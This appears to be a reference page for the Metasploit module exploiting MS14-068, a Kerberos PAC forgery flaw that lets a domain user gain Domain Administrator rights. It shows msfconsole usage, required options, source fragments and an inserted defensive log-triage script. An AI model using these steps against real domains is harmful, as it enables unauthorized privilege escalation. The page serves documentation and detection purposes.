MS14-068 Microsoft Kerberos Checksum Validation Vulnerability - Metasploit


This page contains detailed information about how to use the auxiliary/admin/kerberos/ms14_068_kerberos_checksum Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
Source code: modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
Disclosure date: 2014-11-18
Last modification time: 2022-04-08 11:35:31 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 88
List of CVEs: CVE-2014-6324

This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS request, where a domain user may forge a PAC with arbitrary privileges, including Domain Administrator. This module requests a TGT with a forged PAC and exports it to an MIT Kerberos credential cache file, which can be loaded on Windows systems with the help of Mimikatz. It has been tested successfully on Windows 2008.
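As an added example (not code from this page or from the Metasploit module), the Ruby script below triages constructed Windows Security events for one widely reported host-side indicator of a logon made with a ticket built this way: the event's Account Domain field shows the Kerberos realm (DEMO.LOCAL) instead of the NetBIOS domain name (DEMO). The indicator itself, the NetBIOS name DEMO and the simplified pipe-delimited event format are assumptions of the example.

```ruby
# Added example, not part of the Metasploit module: triage constructed
# Windows Security events for a reported indicator of forged-PAC ticket
# use: 4624/4672 events whose Account Domain is the realm FQDN rather
# than the NetBIOS domain name. The indicator is this example's assumption.

NETBIOS_NAME = 'DEMO' # expected short domain name (assumed for the example)

# Constructed sample events, one per line: EventID|AccountName|AccountDomain|LogonType
SAMPLE_EVENTS = <<~LOG
  4624|alice|DEMO|3
  4624|bob|DEMO.LOCAL|3
  4672|bob|DEMO.LOCAL|-
  4624|svc-backup|DEMO|2
  4672|Administrator|DEMO|-
LOG

Event = Struct.new(:id, :user, :domain, :logon_type)

# Parse the simplified log into Event structs, skipping malformed lines.
def parse_events(text)
  text.each_line.map do |line|
    fields = line.strip.split('|')
    next if fields.length < 3
    Event.new(fields[0].to_i, fields[1], fields[2], fields[3])
  end.compact
end

# A logon (4624) or privileged-logon (4672) event is flagged when its
# domain field is not the expected NetBIOS name, e.g. DEMO.LOCAL.
def suspicious_logons(events, netbios = NETBIOS_NAME)
  events.select do |e|
    [4624, 4672].include?(e.id) && !e.domain.casecmp?(netbios)
  end
end

# Accounts that received special privileges (4672) under an anomalous
# domain form: the ones an analyst should review first.
def privileged_suspects(events, netbios = NETBIOS_NAME)
  suspicious_logons(events, netbios).select { |e| e.id == 4672 }.map(&:user).uniq
end

if __FILE__ == $PROGRAM_NAME
  events = parse_events(SAMPLE_EVENTS)
  suspicious_logons(events).each { |e| puts "#{e.id} #{e.user} @ #{e.domain}" }
  puts "review first: #{privileged_suspects(events).join(', ')}"
end
```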

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf auxiliary(ms14_068_kerberos_checksum) > show targets
    ... a list of targets ...
msf auxiliary(ms14_068_kerberos_checksum) > set TARGET target-id
msf auxiliary(ms14_068_kerberos_checksum) > show options
    ... show and set options ...
msf auxiliary(ms14_068_kerberos_checksum) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • USER: The Domain User

  • PASSWORD: The Domain User password

  • DOMAIN: The Domain (upper case) Ex: DEMO.LOCAL

  • USER_SID: The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000


Msfconsole Usage


Here is how the admin/kerberos/ms14_068_kerberos_checksum auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show info

       Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
     Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-11-18

Provided by:
  Tom Maddock
  Sylvain Monne
  juan vazquez <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
  PASSWORD                   yes       The Domain User password
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     88               yes       The target port
  Timeout   10               yes       The TCP timeout to establish connection and read data
  USER                       yes       The Domain User
  USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

Description:
  This module exploits a vulnerability in the Microsoft Kerberos 
  implementation. The problem exists in the verification of the 
  Privilege Attribute Certificate (PAC) from a Kerberos TGS request, 
  where a domain user may forge a PAC with arbitrary privileges, 
  including Domain Administrator. This module requests a TGT ticket 
  with a forged PAC and exports it to a MIT Kerberos Credential Cache 
  file. It can be loaded on Windows systems with the Mimikatz help. It 
  has been tested successfully on Windows 2008.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2014-6324
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/MS14-068
  OSVDB (114751)
  http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
  https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
  https://github.com/bidord/pykek
  https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit

Module Options


This is a complete list of options available in the admin/kerberos/ms14_068_kerberos_checksum auxiliary module:

msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show options

Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
   PASSWORD                   yes       The Domain User password
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     88               yes       The target port
   Timeout   10               yes       The TCP timeout to establish connection and read data
   USER                       yes       The Domain User
   USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

Advanced Options


Here is a complete list of advanced options supported by the admin/kerberos/ms14_068_kerberos_checksum auxiliary module:

msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show advanced

Module advanced options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/kerberos/ms14_068_kerberos_checksum module can do:

msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the admin/kerberos/ms14_068_kerberos_checksum auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000


Here is a relevant code snippet related to the "Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000" error message:

  def run
    print_status("Validating options...")

    unless datastore['USER_SID'] =~ /^S-(\d+-){6}\d+$/
      print_error("Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000")
      return
    end

    domain = datastore['DOMAIN'].upcase

<PEER> - Invalid AS-REP, aborting...


Here is a relevant code snippet related to the "<PEER> - Invalid AS-REP, aborting..." error message:

      pa_data: pre_auth
    )

    unless res.msg_type == Rex::Proto::Kerberos::Model::AS_REP
      print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
      print_error("#{peer} - Invalid AS-REP, aborting...")
      return
    end

    print_status("#{peer} - Parsing AS-REP...")

<PEER> - Invalid TGS-REP, aborting...


Here is a relevant code snippet related to the "<PEER> - Invalid TGS-REP, aborting..." error message:

      subkey: sub_key
    )

    unless res.msg_type == Rex::Proto::Kerberos::Model::TGS_REP
      print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
      print_error("#{peer} - Invalid TGS-REP, aborting...")
      return
    end

    print_good("#{peer} - Valid TGS-Response, extracting credentials...")

<ERROR_INFO:0> - <ERROR_INFO:1>


Here is a relevant code snippet related to the "<ERROR_INFO:0> - <ERROR_INFO:1>" error message:

  def warn_error(res)
    msg = ''

    if Rex::Proto::Kerberos::Model::ERROR_CODES.has_key?(res.error_code)
      error_info = Rex::Proto::Kerberos::Model::ERROR_CODES[res.error_code]
      msg = "#{error_info[0]} - #{error_info[1]}"
    else
      msg = 'Unknown error'
    end

    msg

Unknown error


Here is a relevant code snippet related to the "Unknown error" error message:

    if Rex::Proto::Kerberos::Model::ERROR_CODES.has_key?(res.error_code)
      error_info = Rex::Proto::Kerberos::Model::ERROR_CODES[res.error_code]
      msg = "#{error_info[0]} - #{error_info[1]}"
    else
      msg = 'Unknown error'
    end

    msg
  end
end




Authors


  • Tom Maddock
  • Sylvain Monne
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
